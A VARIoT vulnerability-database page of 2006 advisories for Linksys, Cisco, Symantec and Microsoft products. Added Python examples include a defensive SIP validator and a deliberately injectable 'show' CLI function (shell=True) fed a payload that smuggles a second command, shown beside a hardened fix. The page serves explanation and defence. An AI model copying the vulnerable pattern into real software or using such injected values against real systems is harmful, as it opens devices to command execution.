VARIoT IoT vulnerabilities database

VAR-200604-0339 | CVE-2006-1973 | Linksys RT31P2 VoIP router denial of service vulnerabilities |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Multiple unspecified vulnerabilities in Linksys RT31P2 VoIP router allow remote attackers to cause a denial of service via malformed Session Initiation Protocol (SIP) messages. Linksys RT31P2 is a broadband router that supports VoIP phone functions.
This issue allows remote attackers to crash affected devices, denying service to legitimate users.
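The RT31P2 bugs are unspecified, so the only mitigation the advisory offers is to filter SIP before it reaches the device. The following is an added example, not code from the advisory or from Linksys: a strict SIP request validator of the kind a filtering proxy would run in front of a fragile user agent, with a constructed sample message. The bounds (MAX_LINE, MAX_HEADERS), the sip:/sips: URI requirement, and the lack of compact header name support are assumptions, not anything the page specifies; nothing here claims to be the specific RT31P2 trigger.

```python
"""Strict SIP request validator, added example (not Linksys or advisory code).

Generic RFC 3261 sanity checks a filtering front-end can apply before a
message reaches a fragile SIP stack. The specific RT31P2 trigger is not
public; nothing here claims to be it. Bounds and the sip:/sips: URI
requirement are assumptions; compact header names (e.g. "v:" for Via)
are not expanded, which a production filter would need to handle.
"""
import re

MAX_LINE = 1024      # assumption: longest header line tolerated
MAX_HEADERS = 64     # assumption: most header lines tolerated
REQ_LINE = re.compile(r"^([A-Z]{1,16}) (sips?:\S{1,512}) SIP/2\.0$")
HEADER = re.compile(r"^([A-Za-z][A-Za-z0-9-]{0,63}):[ \t]*(.*)$")
REQUIRED = ("via", "from", "to", "call-id", "cseq", "max-forwards")


class SipError(ValueError):
    """Raised for any message the filter should drop."""


def parse_sip_request(raw: bytes) -> dict:
    """Parse one SIP request; raise SipError on anything malformed."""
    text = raw.decode("latin-1")             # length-preserving, never fails
    if "\r\n\r\n" not in text:
        raise SipError("no header/body separator")
    head, body = text.split("\r\n\r\n", 1)
    lines = head.split("\r\n")
    if len(lines) > MAX_HEADERS + 1:
        raise SipError("too many header lines")
    if any(len(line) > MAX_LINE for line in lines):
        raise SipError("header line too long")
    m = REQ_LINE.match(lines[0])
    if not m:
        raise SipError("malformed request line")
    method, uri = m.groups()
    headers: dict = {}
    for line in lines[1:]:
        hm = HEADER.match(line)
        if not hm:
            raise SipError(f"malformed header: {line[:40]!r}")
        name, value = hm.group(1).lower(), hm.group(2)
        # Reject control bytes (except TAB) inside header values.
        if re.search(r"[\x00-\x08\x0a-\x1f\x7f]", value):
            raise SipError("control character in header value")
        headers.setdefault(name, []).append(value)
    missing = [h for h in REQUIRED if h not in headers]
    if missing:
        raise SipError(f"missing required headers: {missing}")
    cseq = headers["cseq"][0].split()
    if len(cseq) != 2 or not cseq[0].isdigit() or cseq[1] != method:
        raise SipError("CSeq does not match request method")
    if "content-length" in headers:
        cl = headers["content-length"][0].strip()
        if not cl.isdigit() or int(cl) != len(body):
            raise SipError("Content-Length does not match body")
    return {"method": method, "uri": uri, "headers": headers, "body": body}


def is_well_formed(raw: bytes) -> bool:
    """Filter decision: True to forward, False to drop."""
    try:
        parse_sip_request(raw)
        return True
    except SipError:
        return False


# Constructed sample request (RFC 3261-style example values, not a capture).
SAMPLE_INVITE = (
    b"INVITE sip:bob@example.com SIP/2.0\r\n"
    b"Via: SIP/2.0/UDP 192.0.2.1:5060;branch=z9hG4bK776asdhds\r\n"
    b"Max-Forwards: 70\r\n"
    b"To: Bob <sip:bob@example.com>\r\n"
    b"From: Alice <sip:alice@example.com>;tag=1928301774\r\n"
    b"Call-ID: a84b4c76e66710@192.0.2.1\r\n"
    b"CSeq: 314159 INVITE\r\n"
    b"Content-Length: 0\r\n"
    b"\r\n"
)

if __name__ == "__main__":
    print("sample accepted:", is_well_formed(SAMPLE_INVITE))
    print("CSeq/method mismatch dropped:",
          not is_well_formed(SAMPLE_INVITE.replace(b"314159 INVITE", b"314159 ACK")))
```

The point of the filter is to fail closed on structure (request line shape, header syntax, required headers, CSeq/method agreement, Content-Length agreement) so that an embedded stack with unknown parsing bugs never sees a message that violates the grammar; a real deployment would also have to accept compact header forms and tel: URIs, which this example deliberately leaves out.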
SOLUTION:
The product has reportedly been discontinued.
Filter traffic or use another product.
PROVIDED AND/OR DISCOVERED BY:
Peter Thermos and Guy Hadsall, Telcordia.
ORIGINAL ADVISORY:
US-CERT VU#621566:
http://www.kb.cert.org/vuls/id/621566
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
VAR-200604-0267 | CVE-2006-1961 | Multiple Cisco Linux-based products local shell access vulnerability |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
Cisco CiscoWorks Wireless LAN Solution Engine (WLSE) and WLSE Express before 2.13, Hosting Solution Engine (HSE) and User Registration Tool (URT) before 20060419, and all versions of Ethernet Subscriber Solution Engine (ESSE) and CiscoWorks2000 Service Management Solution (SMS) allow local users to gain Linux shell access via shell metacharacters in arguments to the "show" command in the application's command line interface (CLI), aka bug ID CSCsd21502 (WLSE), CSCsd22861 (URT), and CSCsd22859 (HSE). NOTE: other issues might be addressed by the Cisco advisory. Several Linux-based Cisco products therefore let a local user obtain a Linux shell: they are prone to a local privilege-escalation vulnerability because the CLI fails to properly sanitize user-supplied input before handing it to the underlying shell.
This issue allows attackers with telnet or SSH access to affected devices to execute arbitrary shell commands with superuser privileges, which facilitates complete compromise of affected devices. CiscoWorks WLSE is the centralized system-level application for managing and controlling the entire autonomous Cisco WLAN infrastructure. A separate issue in the CiscoWorks WLSE configuration management script, the "displayMsg" parameter of /wlse/configure/archive/archiveApplyDisplay.jsp, is a cross-site scripting vulnerability (CVE-2006-1960). Attackers can exploit it to steal JSP session cookies and then combine it with other vulnerabilities to gain administrative-level access to the system.
This is related to vulnerability #2 in:
SA19736
SOLUTION:
Apply fixes.
Cisco URT:
Update to version 2.5.5(A1) for the URT appliance.
http://www.cisco.com/pcgi-bin/tablebuild.pl/urt-3des
Cisco HSE:
Apply HSE-PSIRT1 patch. However, Cisco encourages customers requiring a
fix to open a service request through the Technical Support
organization.
TITLE:
Cisco WLSE Privilege Escalation and Cross-Site Scripting
SECUNIA ADVISORY ID:
SA19736
VERIFY ADVISORY:
http://secunia.com/advisories/19736/
CRITICAL:
Less critical
IMPACT:
Cross Site Scripting, Privilege escalation
WHERE:
From remote
OPERATING SYSTEM:
CiscoWorks Wireless LAN Solution Engine 2.x
http://secunia.com/product/2187/
DESCRIPTION:
Adam Pointon has reported two vulnerabilities in CiscoWorks Wireless
LAN Solution Engine (WLSE), which can be exploited by malicious,
local users to gain escalated privileges or by malicious people to
conduct cross-site scripting attacks.
1) Input passed to the "displayMsg" parameter in
"/wlse/configure/archive/archiveApplyDisplay.jsp" in the WLSE
appliance web interface is not properly sanitised before being
returned to users. This can be exploited to execute arbitrary HTML
and script code in a user's browser session in context of a
vulnerable site.
2) Several errors in the "show" CLI application can be exploited to
gain a shell account with root privileges from the command line
interface.
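What "shell metacharacters in arguments to the show command" means in practice, as an added example; this is not Cisco's code, and the WLSE/HSE/URT CLI internals are not public. SHOW_TABLE is a hypothetical restricted command table; the allowlist pattern SAFE_ARG is an assumption. The pattern shown is the one the advisory describes: a management CLI that interpolates an operator-supplied argument into a string and hands it to /bin/sh, so ; | & ` and $( ) escape the restricted command set and run in the shell the CLI itself runs as.

```python
"""Restricted 'show' CLI: shell-metacharacter injection and the hardened form.

Added example; not Cisco's code, and the WLSE/HSE/URT CLI internals are not
public. SHOW_TABLE is a hypothetical command table. The pattern is the one
the advisory describes: a management CLI that hands user-supplied arguments
to /bin/sh, so metacharacters (; | & ` $( )) escape the restricted command
set and land in the underlying shell.
"""
import re
import subprocess

# Hypothetical restricted command table: subcommand -> argv template.
SHOW_TABLE = {
    "banner": ["echo", "{arg}"],            # echo a string back to the operator
    "log":    ["cat", "/var/log/{arg}"],    # display one log file by name
}

# Assumption: the only characters a legitimate argument ever needs.
# No shell metacharacters, no '/' (so no path traversal into other files).
SAFE_ARG = re.compile(r"^[A-Za-z0-9._-]{1,64}$")


def argument_is_safe(arg: str) -> bool:
    """Allowlist check: True only for arguments matching SAFE_ARG."""
    return SAFE_ARG.fullmatch(arg) is not None


def vulnerable_show(sub: str, arg: str) -> str:
    """The bug: interpolate the argument into a string and let /bin/sh parse it."""
    cmd = " ".join(SHOW_TABLE[sub]).format(arg=arg)   # e.g. 'echo hello; id'
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def hardened_show(sub: str, arg: str) -> str:
    """The fix: validate, then exec an argv list with no shell in between."""
    if sub not in SHOW_TABLE:
        raise ValueError(f"unknown show subcommand: {sub!r}")
    if not argument_is_safe(arg):
        raise ValueError(f"rejected argument: {arg!r}")
    argv = [part.format(arg=arg) for part in SHOW_TABLE[sub]]
    # shell=False: the argument is one argv element and is never re-parsed.
    return subprocess.run(argv, shell=False, capture_output=True, text=True).stdout


if __name__ == "__main__":
    payload = "hello; echo INJECTED"
    print("vulnerable:", vulnerable_show("banner", payload).split())
    try:
        hardened_show("banner", payload)
    except ValueError as exc:
        print("hardened:", exc)
    print("hardened, legit arg:", hardened_show("banner", "hello").strip())
```

Two things together make the hardened form hold: the allowlist rejects anything outside the expected character set, and the argv-list exec means there is no shell to interpret whatever gets through. Escaping with shlex.quote and keeping shell=True is the weaker option, since it still trusts the shell's parser, and it does nothing for the "log" case where the real concern is which file gets read.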
SOLUTION:
Update to version 2.13 or later.
http://www.cisco.com/pcgi-bin/tablebuild.pl/wlan-sol-eng
PROVIDED AND/OR DISCOVERED BY:
Adam Pointon, Assurance.
The vendor also credits Mathieu Pepin for reporting the second
vulnerability.
ORIGINAL ADVISORY:
Cisco:
http://www.cisco.com/warp/public/707/cisco-sa-20060419-wlse.shtml
http://www.cisco.com/warp/public/707/cisco-sr-20060419-priv.shtml
Assurance:
http://www.assurance.com.au/advisories/200604-cisco.txt
VAR-200604-0323 | CVE-2006-1927 | Cisco IOS XR MPLS Denial of Service Vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Cisco IOS XR, when configured for Multi Protocol Label Switching (MPLS) and running on Cisco CRS-1 or Cisco 12000 series routers, allows remote attackers to cause a denial of service (Line card crash) via certain MPLS packets, as identified by Cisco bug ID CSCsc77475. A remote third party can therefore crash a line card and disrupt service.
A successful attack results in a denial-of-service condition for traffic that is being switched on an affected Modular Services Card (MSC) or line card.
A sustained denial-of-service condition can also arise from repeated attacks. Cisco IOS XR Software, a member of the Cisco IOS Software family, uses a microkernel-based distributed operating system infrastructure. Cisco IOS XR runs on Cisco CRS-1 and Cisco 12000 series routers. MPLS packets are forwarded through the MPLS network, so the packets that trigger this vulnerability can be sent from remote systems in the MPLS network. Such packets cannot be received on interfaces that are not configured with MPLS.
Successful exploitation requires that MPLS has been configured on the
network device.
SOLUTION:
Apply patches (see patch matrix in vendor advisory).
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor.
ORIGINAL ADVISORY:
Cisco:
http://www.cisco.com/warp/public/707/cisco-sa-20060419-xr.shtml
VAR-200604-0266 | CVE-2006-1960 | Cisco WLSE archiveApplyDisplay.jsp Cross-site scripting vulnerability |
CVSS V2: 5.8 CVSS V3: - Severity: MEDIUM |
Cross-site scripting (XSS) vulnerability in the appliance web user interface in Cisco CiscoWorks Wireless LAN Solution Engine (WLSE) and WLSE Express before 2.13 allows remote attackers to inject arbitrary web script or HTML, possibly via the displayMsg parameter to archiveApplyDisplay.jsp, aka bug ID CSCsc01095. CiscoWorks Wireless LAN Solution Engine (WLSE) is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal JSP session cookie-based authentication credentials and launch other attacks. CiscoWorks WLSE is the centralized system-level application for managing and controlling the entire autonomous Cisco WLAN infrastructure. There is a vulnerability in the implementation of the CiscoWorks WLSE configuration management script. Attackers may exploit this vulnerability to obtain sensitive information. The "displayMsg" parameter in /wlse/configure/archive/archiveApplyDisplay.jsp in WLSE devices can lead to a cross-site scripting vulnerability.
The cross-site scripting issue is vulnerability #1 in SA19736. The related CLI shell-access issue (vulnerability #2 in SA19736, CVE-2006-1961) has separate fixes for the other affected products:
SOLUTION:
Apply fixes.
Cisco URT:
Update to version 2.5.5(A1) for the URT appliance.
http://www.cisco.com/pcgi-bin/tablebuild.pl/urt-3des
Cisco HSE:
Apply HSE-PSIRT1 patch.
1) Input passed to the "displayMsg" parameter in
"/wlse/configure/archive/archiveApplyDisplay.jsp" in the WLSE
appliance web interface is not properly sanitised before being
returned to users.
2) Several errors in the "show" CLI application can be exploited to
gain a shell account with root privileges from the command line
interface.
SOLUTION:
Update to version 2.13 or later.
http://www.cisco.com/pcgi-bin/tablebuild.pl/wlan-sol-eng
PROVIDED AND/OR DISCOVERED BY:
Adam Pointon, Assurance.
The vendor also credits Mathieu Pepin for reporting the second
vulnerability.
ORIGINAL ADVISORY:
Cisco:
http://www.cisco.com/warp/public/707/cisco-sa-20060419-wlse.shtml
http://www.cisco.com/warp/public/707/cisco-sr-20060419-priv.shtml
Assurance:
http://www.assurance.com.au/advisories/200604-cisco.txt
VAR-200604-0363 | CVE-2006-1836 | Symantec LiveUpdate for Macintosh Local privilege elevation vulnerability |
CVSS V2: 6.8 CVSS V3: - Severity: MEDIUM |
Untrusted search path vulnerability: unspecified components in Symantec LiveUpdate for Macintosh 3.0.0 through 3.5.0 do not set the execution path, which allows local users to gain privileges via a Trojan horse program. Symantec LiveUpdate for Macintosh is prone to a local privilege-escalation vulnerability. This issue is due to the application's failure to properly use the PATH environment variable in some of its components.
A successful exploit allows local attackers to gain superuser privileges, leading to a complete compromise of the affected computer.
TITLE:
Symantec LiveUpdate for Macintosh Privilege Escalation
SECUNIA ADVISORY ID:
SA19682
VERIFY ADVISORY:
http://secunia.com/advisories/19682/
CRITICAL:
Less critical
IMPACT:
Privilege escalation
WHERE:
Local system
SOFTWARE:
Symantec Norton Utilities for Macintosh 8.x
http://secunia.com/product/5953/
Symantec Norton SystemWorks for Macintosh 3.x
http://secunia.com/product/5952/
Symantec Norton Personal Firewall for Macintosh 3.x
http://secunia.com/product/5950/
Symantec Norton Internet Security for Macintosh 3.x
http://secunia.com/product/5951/
Symantec Norton AntiVirus for Macintosh 9.x
http://secunia.com/product/5948/
Symantec Norton AntiVirus for Macintosh 10.x
http://secunia.com/product/5949/
Symantec LiveUpdate for Macintosh 3.x
http://secunia.com/product/5954/
DESCRIPTION:
A vulnerability has been reported in Symantec LiveUpdate for
Macintosh, which can be exploited by malicious, local users to gain
escalated privileges.
SOLUTION:
Apply latest LiveUpdate patch.
PROVIDED AND/OR DISCOVERED BY:
The vendor credits DigitalMunition.com.
ORIGINAL ADVISORY:
http://securityresponse.symantec.com/avcenter/security/Content/2006.04.17b.html
VAR-200604-0205 | CVE-2006-1192 | Microsoft Internet Explorer address bar spoofing vulnerability |
CVSS V2: 2.6 CVSS V3: - Severity: LOW |
Microsoft Internet Explorer 5.01 through 6 allows remote attackers to conduct phishing attacks by spoofing the address bar and other parts of the trust UI via unknown methods that allow "window content to persist" after the user has navigated to another site, aka the "Address Bar Spoofing Vulnerability." NOTE: this is a different vulnerability than CVE-2006-1626. Microsoft Internet Explorer is prone to address-bar spoofing. Attackers may exploit this via a malicious web page to spoof the contents of a page that the victim may trust. This vulnerability may be useful in phishing or other attacks that rely on content spoofing.
TITLE:
Internet Explorer Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA18957
VERIFY ADVISORY:
http://secunia.com/advisories/18957/
CRITICAL:
Highly critical
IMPACT:
Spoofing, System access, Cross Site Scripting
WHERE:
From remote
SOFTWARE:
Microsoft Internet Explorer 5.5
http://secunia.com/product/10/
Microsoft Internet Explorer 5.01
http://secunia.com/product/9/
Microsoft Internet Explorer 6.x
http://secunia.com/product/11/
DESCRIPTION:
Multiple vulnerabilities have been reported in Internet Explorer,
which can be exploited by malicious people to conduct cross-site
scripting attacks, conduct phishing attacks, or compromise a user's
system.
1) An error in the cross-domain restriction when accessing properties
of certain dynamically created objects can be exploited to execute
arbitrary HTML and script code in a user's browser session in context
of an arbitrary site via a JavaScript URI handler applied on a
dynamically created "object" tag.
2) An error within the handling of multiple event handlers (e.g.
onLoad) in an HTML element can be exploited to corrupt memory in a
way that may allow execution of arbitrary code.
3) An error within the parsing of specially crafted, non-valid HTML
can be exploited to corrupt memory in a way that allows execution of
arbitrary code when a malicious HTML document is viewed.
4) An error within the instantiation of COM objects that are not
intended to be instantiated in Internet Explorer can be exploited to
corrupt memory in a way that allows execution of arbitrary code.
5) An error within the handling of HTML elements containing a
specially crafted tag can be exploited to corrupt memory in a way
that allows execution of arbitrary code.
6) An error within the handling of double-byte characters in
specially crafted URLs can be exploited to corrupt memory in a way
that allows execution of arbitrary code.
Successful exploitation requires that the system uses double-byte
character sets.
7) An error in the way IOleClientSite information is returned when an
embedded object is dynamically created can be exploited to execute
arbitrary code in context of another site or security zone.
8) An unspecified error can be exploited to spoof information
displayed in the address bar and other parts of the trust UI.
9) Some unspecified vulnerabilities exist in the two ActiveX controls
included with Danim.dll and Dxtmsft.dll.
SOLUTION:
Apply patches.
Internet Explorer 5.01 SP4 on Windows 2000 SP4:
http://www.microsoft.com/downloa...7B87-AF8F-4346-9164-596E3E5C22B1
Internet Explorer 6 SP1 on Windows 2000 SP4 or Windows XP SP1:
http://www.microsoft.com/downloa...41E1-2B36-4696-987A-099FC57E0129
Internet Explorer 6 for Windows XP SP2:
http://www.microsoft.com/downloa...FB31-E6B4-4771-81F1-4ACCEBF72133
Internet Explorer 6 for Windows Server 2003 and Windows Server 2003
SP1:
http://www.microsoft.com/downloa...6871-D217-41D3-BECC-B27FAFA00054
Internet Explorer 6 for Windows Server 2003 for Itanium-based systems
and Windows Server 2003 with SP1 for Itanium-based systems:
http://www.microsoft.com/downloa...957C-0ABE-4129-ABAF-AA2852AD62A3
Internet Explorer 6 for Windows Server 2003 x64 Edition:
http://www.microsoft.com/downloa...8BE3-39EE-4937-9BD1-280FC35125C6
Internet Explorer 6 for Windows XP Professional x64 Edition:
http://www.microsoft.com/downloa...FE3E-620A-4BBC-868B-CA2D9EFF7AC3
Internet Explorer 6 SP1 on Windows 98, Windows 98 SE, or Windows ME:
Patches are available via the Microsoft Update Web site or the
Windows Update Web site.
PROVIDED AND/OR DISCOVERED BY:
1) Discovered by anonymous person.
2) Michal Zalewski
3) The vendor credits Jan P. Monsch, Compass Security Network
Computing.
4) The vendor credits Richard M. Smith, Boston Software Forensics.
5) The vendor credits Thomas Waldegger.
6) The vendor credits Sowhat, Nevis Labs.
7) The vendor credits Heiko Schultze, SAP.
9) The vendor credits Will Dormann, CERT/CC.
ORIGINAL ADVISORY:
MS06-013 (KB912812):
http://www.microsoft.com/technet/security/Bulletin/MS06-013.mspx
VAR-200604-0199 | CVE-2006-0015 | Microsoft FrontPage Server Extensions (IIS) cross-site scripting vulnerability |
CVSS V2: 6.8 CVSS V3: - Severity: MEDIUM |
Cross-site scripting (XSS) vulnerability in _vti_bin/_vti_adm/fpadmdll.dll in Microsoft FrontPage Server Extensions 2002 and SharePoint Team Services allows remote attackers to inject arbitrary web script or HTML, then leverage the attack to execute arbitrary programs or create new accounts, via the (1) operation, (2) command, and (3) name parameters. Microsoft FrontPage Server Extensions are prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before it is rendered to other users.
An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user, with the privileges of the victim user's account. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
SOLUTION:
Apply patches.
FrontPage Server Extensions 2002 (Windows Server 2003 and Windows
Server 2003 SP1):
http://www.microsoft.com/downloads/details.aspx?FamilyId=5C03F85A-5228-47FB-A338-90FA23818E08
FrontPage Server Extensions 2002 (Windows Server 2003 for
Itanium-based systems and Windows Server 2003 with SP1 for
Itanium-based systems):
http://www.microsoft.com/downloads/details.aspx?FamilyId=59F15A6B-CC1B-43D5-A007-BFC9ABB63486
FrontPage Server Extensions 2002 (x64 Edition) downloaded and
installed on Windows Server 2003 x64 Edition and Windows XP Pro x64
Edition:
http://www.microsoft.com/downloads/details.aspx?FamilyId=F453530D-7063-49AB-B304-9C455DE6D8DA
FrontPage Server Extensions 2002 (x86 Editions) downloaded and
installed on Windows Server 2000 SP4, Windows XP SP1, and Windows XP
SP2:
http://www.microsoft.com/downloads/details.aspx?FamilyId=F453530D-7063-49AB-B304-9C455DE6D8DA
Microsoft SharePoint Team Services:
http://www.microsoft.com/downloads/details.aspx?FamilyId=EEE40662-39E6-4C07-8241-1AC4F5D24FFC
PROVIDED AND/OR DISCOVERED BY:
The vendor credits Esteban Martínez Fayó.
ORIGINAL ADVISORY:
MS06-017 (KB917627):
http://www.microsoft.com/technet/security/Bulletin/MS06-017.mspx
VAR-200604-0097 | CVE-2006-1670 | Cisco Optical Networking System Denial of Service (DoS) Vulnerability |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
Control cards for Cisco Optical Networking System (ONS) 15000 series nodes before 20060405 allow remote attackers to cause a denial of service (memory exhaustion and possibly card reset) by sending an invalid response when the final ACK is expected, aka bug ID CSCei45910. A remote third party can thus exhaust control card memory and possibly force a card reset, denying service. Cisco Optical Networking System and Transport Controller are prone to multiple vulnerabilities.
Cisco Optical Networking System 15000 series are affected by multiple denial-of-service vulnerabilities.
Cisco Transport Controller is prone to an arbitrary code-execution vulnerability.
1) Multiple services are vulnerable to ACK DoS attacks where an
invalid response is sent instead of the final ACK packet during the
3-way handshake. This can be exploited to cause the control cards to
exhaust memory resources, not respond to further connections, or
reset by establishing multiple of these connections.
Successful exploitation requires that IP is configured on the LAN
interface (enabled by default).
2) An error within the processing of IP packets can be exploited to
reset the control cards by sending a specially crafted IP packet.
Successful exploitation requires that IP is configured on the LAN
interface (enabled by default) and secure mode for element management
system (EMS)-to-network-element access is enabled (disabled by
default).
3) Another error within the processing of IP packets can be exploited
to reset the control cards by sending a specially crafted IP packet.
Successful exploitation requires that IP is configured on the LAN
interface (enabled by default).
4) An error within the processing of OSPF (Open Shortest Path First)
packets can be exploited to reset the control cards by sending a
specially crafted OSPF packet.
Successful exploitation requires that the OSPF routing protocol is
configured on the LAN interface (disabled by default).
Successful exploitation of the above vulnerabilities (#1 through #4)
requires that the Optical node has the Common Control Card connected
to a DCN (Data Communication Network) and is enabled for IPv4.
The above vulnerabilities (#1 through #4) affect the following Cisco
ONS 15000 series platforms:
* Cisco ONS 15310-CL Series
* Cisco ONS 15327 Series
* Cisco ONS 15454 MSPP
* Cisco ONS 15454 MSTP
* Cisco ONS 15600 Series
The following Cisco ONS 15000 series platforms are not affected by
the vulnerabilities:
* Cisco ONS 15100 Series
* Cisco ONS 15200 Series
* Cisco ONS 15302, ONS 15305, and ONS 15310-MA platforms
* Cisco ONS 15500 Series
* Cisco ONS 15800 Series
5) A vulnerability exists within the Cisco Transport Controller (CTC)
applet launcher, which is downloaded each time a management connection
is made to the Optical node. The vulnerability is caused due to the
java.policy permissions being too broad by granting all permissions to
any software originating from the codeBase or source at
http://*/fs/LAUNCHER.jar.
This can be exploited to execute arbitrary code on the CTC
workstation if it is used to connect to a malicious web site running
Java code from the "/fs/LAUNCHER.jar" location.
The vulnerability affects versions 4.0.x and prior.
SOLUTION:
1-4) Updated versions are available (see patch matrix in vendor
advisory).
PROVIDED AND/OR DISCOVERED BY:
Reported by vendor.
ORIGINAL ADVISORY:
http://www.cisco.com/warp/public/707/cisco-sa-20060405-ons.shtml
VAR-200604-0132 | CVE-2006-1631 | Cisco 11500 Content Services Switch HTTP Compression Request Handling Remote Denial of Service Vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Unspecified vulnerability in the HTTP compression functionality in Cisco CSS 11500 Series Content Services switches allows remote attackers to cause a denial of service (device reload) via (1) "valid, but obsolete" or (2) "specially crafted" HTTP requests. The Cisco CSS 11500 Content Services Switch is a load balancing device that provides robust and scalable network services (Layer 4-7) for data centers.
The Cisco CSS 11500 has a vulnerability in processing HTTP requests when HTTP compression is enabled. A successful attack triggers a reload of the device, and repeated attacks produce a sustained denial-of-service condition.
Successful exploitation requires that the network device has been
configured for HTTP compression.
SOLUTION:
Update to version 8.10.1.6.
http://www.cisco.com/pcgi-bin/tablebuild.pl/css11500-maint?psrtdcat20e2
Disable HTTP compression.
PROVIDED AND/OR DISCOVERED BY:
Reported by vendor.
ORIGINAL ADVISORY:
http://www.cisco.com/warp/public/707/cisco-sa-20060405-css.shtml
VAR-200604-0099 | CVE-2006-1672 | Cisco Optical Networking System Transport Controller multiple vulnerabilities |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
The installation of Cisco Transport Controller (CTC) for Cisco Optical Networking System (ONS) 15000 series nodes adds a Java policy file entry with a wildcard that grants the java.security.AllPermission permission to any http URL containing "fs/LAUNCHER.jar", which allows remote attackers to execute arbitrary code on a CTC workstation, aka bug ID CSCea25049. Cisco Optical Networking System and Transport Controller are prone to multiple vulnerabilities.
Cisco Optical Networking System 15000 series are affected by multiple denial-of-service vulnerabilities.
Cisco Transport Controller is prone to an arbitrary code-execution vulnerability: its java.policy file grants java.security.AllPermission to code loaded from a wildcard codeBase (see item 5 below).
1) Multiple services are vulnerable to ACK DoS attacks where an
invalid response is sent instead of the final ACK packet during the
3-way handshake. This can be exploited to cause the control cards to
exhaust memory resources, not respond to further connections, or
reset by establishing multiple of these connections.
Successful exploitation requires that IP is configured on the LAN
interface (enabled by default).
2) An error within the processing of IP packets can be exploited to
reset the control cards by sending a specially crafted IP packet.
Successful exploitation requires that IP is configured on the LAN
interface (enabled by default) and secure mode for element management
system (EMS)-to-network-element access is enabled (disabled by
default).
3) Another error within the processing of IP packets can be exploited
to reset the control cards by sending a specially crafted IP packet.
Successful exploitation requires that IP is configured on the LAN
interface (enabled by default).
4) An error within the processing of OSPF (Open Shortest Path First)
packets can be exploited to reset the control cards by sending a
specially crafted OSPF packet.
Successful exploitation requires that the OSPF routing protocol is
configured on the LAN interface (disabled by default).
Successful exploitation of the above vulnerabilities (#1 through #4)
requires that the Optical node has the Common Control Card connected
to a DCN (Data Communication Network) and is enabled for IPv4.
The above vulnerabilities (#1 through #4) affect the following Cisco
ONS 15000 series platforms:
* Cisco ONS 15310-CL Series
* Cisco ONS 15327 Series
* Cisco ONS 15454 MSPP
* Cisco ONS 15454 MSTP
* Cisco ONS 15600 Series
The following Cisco ONS 15000 series platforms are not affected by
the vulnerabilities:
* Cisco ONS 15100 Series
* Cisco ONS 15200 Series
* Cisco ONS 15302, ONS 15305, and ONS 15310-MA platforms
* Cisco ONS 15500 Series
* Cisco ONS 15800 Series
5) A vulnerability exists within the Cisco Transport Controller (CTC)
applet launcher, which is downloaded each time a management connection
is made to the Optical node. The vulnerability is caused by the
java.policy permissions being too broad: all permissions are granted to
any software originating from the codeBase or source at
http://*/fs/LAUNCHER.jar.
The vulnerability affects versions 4.0.x and prior.
SOLUTION:
1-4) Updated versions are available (see patch matrix in vendor
advisory).
PROVIDED AND/OR DISCOVERED BY:
Reported by vendor.
ORIGINAL ADVISORY:
http://www.cisco.com/warp/public/707/cisco-sa-20060405-ons.shtml
----------------------------------------------------------------------
VAR-200604-0098 | CVE-2006-1671 | Cisco Optical Networking System Denial of Service (DoS) Vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Control cards for Cisco Optical Networking System (ONS) 15000 series nodes before 20060405 allow remote attackers to cause a denial of service (card reset) via (1) a "crafted" IP packet to a device with secure mode EMS-to-network-element access, aka bug ID CSCsc51390; (2) a "crafted" IP packet to a device with IP on the LAN interface, aka bug ID CSCsd04168; and (3) a "malformed" OSPF packet, aka bug ID CSCsc54558. Cisco Optical Networking System (ONS) control cards contain a vulnerability that a remote third party can exploit to cause a denial of service (card reset). Cisco Optical Networking System and Transport Controller are prone to multiple vulnerabilities.
Cisco Optical Networking System 15000 series are affected by multiple denial-of-service vulnerabilities.
Cisco Transport Controller is prone to an arbitrary code-execution vulnerability.
1) Multiple services are vulnerable to ACK DoS attacks where an
invalid response is sent instead of the final ACK packet during the
3-way handshake. This can be exploited to cause the control cards to
exhaust memory resources, stop responding to further connections, or
reset, by establishing many such connections.
Successful exploitation requires that IP is configured on the LAN
interface (enabled by default).
2) An error within the processing of IP packets can be exploited to
reset the control cards by sending a specially crafted IP packet.
Successful exploitation requires that IP is configured on the LAN
interface (enabled by default) and secure mode for element management
system (EMS)-to-network-element access is enabled (disabled by
default).
3) Another error within the processing of IP packets can be exploited
to reset the control cards by sending a specially crafted IP packet.
Successful exploitation requires that IP is configured on the LAN
interface (enabled by default).
4) An error within the processing of OSPF (Open Shortest Path First)
packets can be exploited to reset the control cards by sending a
specially crafted OSPF packet.
Successful exploitation requires that the OSPF routing protocol is
configured on the LAN interface (disabled by default).
Successful exploitation of the above vulnerabilities (#1 through #4)
requires that the Optical node has the Common Control Card connected
to a DCN (Data Communication Network) and is enabled for IPv4.
The above vulnerabilities (#1 through #4) affect the following Cisco
ONS 15000 series platforms:
* Cisco ONS 15310-CL Series
* Cisco ONS 15327 Series
* Cisco ONS 15454 MSPP
* Cisco ONS 15454 MSTP
* Cisco ONS 15600 Series
The following Cisco ONS 15000 series platforms are not affected by
the vulnerabilities:
